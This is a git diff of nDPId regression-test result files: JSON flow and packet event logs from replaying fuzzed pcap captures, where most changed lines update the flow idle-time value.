+00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
+00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7560000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
+00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7560000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120470985421,"flow_last_seen":1120470985466,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":860,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7560000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
+00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7560000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00582{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","packets-captured":691,"packets-processed":554,"total-skipped-flows":0,"total-l4-data-len":58605,"total-not-detected-flows":27,"total-guessed-flows":28,"total-detected-flows":194,"total-detection-updates":88,"total-updates":33,"current-active-flows":0,"total-active-flows":249,"total-idle-flows":249,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1435,"global_ts_msec":1120471107427} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 691/554 diff --git a/test/results/fuzz-2006-09-29-28586.pcap.out b/test/results/fuzz-2006-09-29-28586.pcap.out index bf52ccd4d..ff91c0aa0 100644 --- a/test/results/fuzz-2006-09-29-28586.pcap.out +++ b/test/results/fuzz-2006-09-29-28586.pcap.out 
@@ -2,207 +2,207 @@ 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1031854484481} 00197{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2304,"global_ts_msec":1031854484481} 00351{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2304,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"CAAgsl17AFCLk5N8CQBFAAAo8EpAAIAGrEqsFAMFrBQDDQooAFDkFf3+yWv\/bVARIal6iQAABIGD1GDD"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854484481,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854484481,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKVAAEAGF\/CsFAMNrBQDBQBQCijJa\/9t5BX9\/1AQgywZBgAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1031854484481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKZAAEAGF++sFAMNrBQDBQBQCijJa\/9t5BX9\/1ARgywZBQAA"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5N8CABFAAAo8UpAAIAGq0qsFAMFrBQDDQooAFDkFf3\/yWv\/blAQIal6iAAABIGD1GDD"} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854484481,"flow_last_seen":1031854484481,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854484481,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1031854484481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKVAAEAGF\/CsFAMNrBQDBQBQCijJa\/9t5BX9\/1AQgywZBgAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1031854484481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854484481,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKZAAEAGF++sFAMNrBQDBQBQCijJa\/9t5BX9\/1ARgywZBQAA"} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1031854484482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5N8CABFAAAo8UpAAIAGq0qsFAMFrBQDDQooAFDkFf3\/yWv\/blAQIal6iAAABIGD1GDD"} 00197{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2246,"global_ts_msec":1031854488666} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2246,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854484482,"pkt":"CAAgsl17AFCLk5J8CMZFAAAs9EpAAIAGqEasFAMFrBQDDQopAFDkS6qJAAAAACUCMACAnQAAuAQFtGBh"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488666,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854488666,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854488666,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxKdAAEAGF+qsFAMNrBQDBQBQCinJpw1U5EuqimASgyxGZAAAAgQFtA=="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854488666,"pkt":"CAAgsl17AFCLk5N8CABFAAAo9UpAAIAGp0qsFAMFrBQDDQopAFDkS6qKyacNVVAQIji\/FQAAAgQFtGDD"} -02416{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1031854488667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854488667,"pkt":"CAAgsl17AFCLk5N8CABFAAXc9kpAAIAGoJasFAMFrBQDDQopAFDkS6qKyacNVVAQIjheTQAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N8OiAxNzIuMjAuMy4xMw0KT3B0OiDQaHR0cDovL3d3dy53My5vcmdtMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLUFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCkFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTowPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3Lnd2Lm9yZy8xOTk5LzAyL6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854488666,"flow_last_seen":1031854488667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1031854488667,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKhAAEAGF+2sFAMNrBQDBQBRCinJpw1V5EuwPlAQgyxYbQAA"} 